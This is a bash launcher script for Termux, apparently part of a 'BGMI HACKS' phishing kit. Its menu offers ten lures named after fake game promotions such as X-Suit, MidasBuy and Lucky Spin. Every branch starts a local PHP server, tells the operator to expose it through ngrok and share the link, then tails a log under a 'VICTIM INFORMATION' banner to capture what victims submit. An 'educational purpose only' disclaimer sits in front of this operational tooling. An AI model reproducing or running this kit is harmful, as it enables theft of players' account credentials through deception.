#!/bin/bash
clear
echo ""
echo ""
printf "\e[100;330m[\e[10m **** ]\e[1;40m\e[10m BGMI HACKS :\e[1;32m Join Telegram Channel \e[1;33m @BGMIHACKS  !\e[0m"
sleep 4
echo ""
clear
echo ""
printf "\e[31m[\e[32m★\e[31m]\e[32m This Tool is only for educational purpose and we are not responsible for kind of illegal activity done by this tool\e[m "
echo ""
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Accepted This Notice \e[1;91m (Y/N) : \e[0m' option
echo""
echo""
echo""

if [[ $option == *'N'* ]]; then
clear
exit
fi
if [[ $option == *'n'* ]]; then
clear
exit
fi

php="$(ps -efw | grep php | grep -v grep | awk '{print $2}')"
ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
kill -9 $php
kill -9 $ngrok
clear
cd /data/data/com.termux/files/usr/bin/BGMI HACKS/
bash Logo.sh
bash Logo2.sh
echo ""
echo ""
                 echo -e $''   
                 read -p $'\e[1;91m[\e[0m\e[1;91m *** \e[0m\e[1;96m]\e[0m\e[1;96m  You Want to Choose Phishing Option  \e[1;91m  > : \e[0m' option
                 echo ""
		 if [ $option = 01 ] || [ $option = 1 ]
                 then 
                           cd /data/data/com.termux/files/usr/bin/TAMJID
                           cd X-Suit/
			   echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝   
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
			   
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt

	          break;
		  
                  elif [ $option = 02 ] || [ $option = 2 ]
	          then
	                   cd /data/data/com.termux/files/usr/bin/TAMJID/
                           cd MidasBuy/         
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
	  ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝   
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m   TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt


                  break;
                  elif [ $option = 03 ] || [ $option = 3 ]
	          then
                           cd /data/data/com.termux/files/usr/bin/TAMJID/
                           cd Collect-MC-Larent-Car/
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ 
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt 
 
                  
                 break;
                 elif [ $option = 04 ] || [ $option = 4 ]
	         then
                           cd /data/data/com.termux/files/usr/bin/TAMJID/
                           cd SPIN-EVENT/
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ 
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt
                  
                  
                  
                break;
                elif [ $option = 05 ] || [ $option = 5 ]
	        then 
                           cd /data/data/com.termux/files/usr/bin/TAMJID/
                           cd Collect-EVENT-LINE/
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ 
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt
                  
                 break;
                 elif [ $option = 06 ] || [ $option = 6 ]
	         then
                
                           cd /data/data/com.termux/files/usr/bin/TAMJID1/
                           cd X-Suit-LuckySpin/
			   echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝   
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > log.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt 
                  
                break;
   elif [ $option = 07 ] || [ $option = 7 ]
	          then
	                   cd /data/data/com.termux/files/usr/bin/TAMJID1/
                           cd Godzilla-LuckySpin/         
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ 
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt


                  break;
    elif [ $option = 08 ] || [ $option = 8 ]
	          then
	                   cd /data/data/com.termux/files/usr/bin/TAMJID1/
                           cd COLLECT-S19-ID/         
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ 
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt

                  break;   
		  
elif [ $option = 09 ] || [ $option = 9 ]
	          then
	                   cd /data/data/com.termux/files/usr/bin/TAMJID1/
                           cd RPS19-COLLECT/         
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ 
BGMI HACKS			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt


                  break;		  
elif [ $option = 10 ] || [ $option = 010 ]
	          then
	                   cd /data/data/com.termux/files/usr/bin/TAMJID/
                           cd Lucky-Spin-Godzila-S19/     
                           echo ""
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m Manually Start Ngrok \e[m "
                           echo ""
			   echo ""
			   echo -e "\e[91m[\e[92m*\e[91m]\e[1;93m Open New Session (tab) Type This Command :\e[0m\e[1;36m Run-Ngrok  "
                           echo ""
			   echo ""
			   echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Click ENTER to Continue \e[1;91m (enter) : \e[0m' option
                           echo""
                           echo""
                           echo ""
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m BGMI HACKS Server Connect... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Server Status Chacking ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Scan Live User Traffic Security ... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP Server Now Startng ... \e[0m  "
                           echo ""
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 3
			   echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
TAMJID ©\e[34m
      ██████╗ ██╗   ██╗██████╗  ██████╗       ██╗  ██╗ █████╗  ██████╗██╗  ██╗
      ██╔══██╗██║   ██║██╔══██╗██╔════╝       ██║  ██║██╔══██╗██╔════╝██║ ██╔╝
      ██████╔╝██║   ██║██████╔╝██║  ███╗█████╗███████║███████║██║     █████╔╝ 
      ██╔═══╝ ██║   ██║██╔══██╗██║   ██║╚════╝██╔══██║██╔══██║██║     ██╔═██╗ 
      ██║     ╚██████╔╝██████╔╝╚██████╔╝      ██║  ██║██║  ██║╚██████╗██║  ██╗
      ╚═╝      ╚═════╝ ╚═════╝  ╚═════╝       ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ 
BGMI HACKS			  
							  							  
          \e[m"
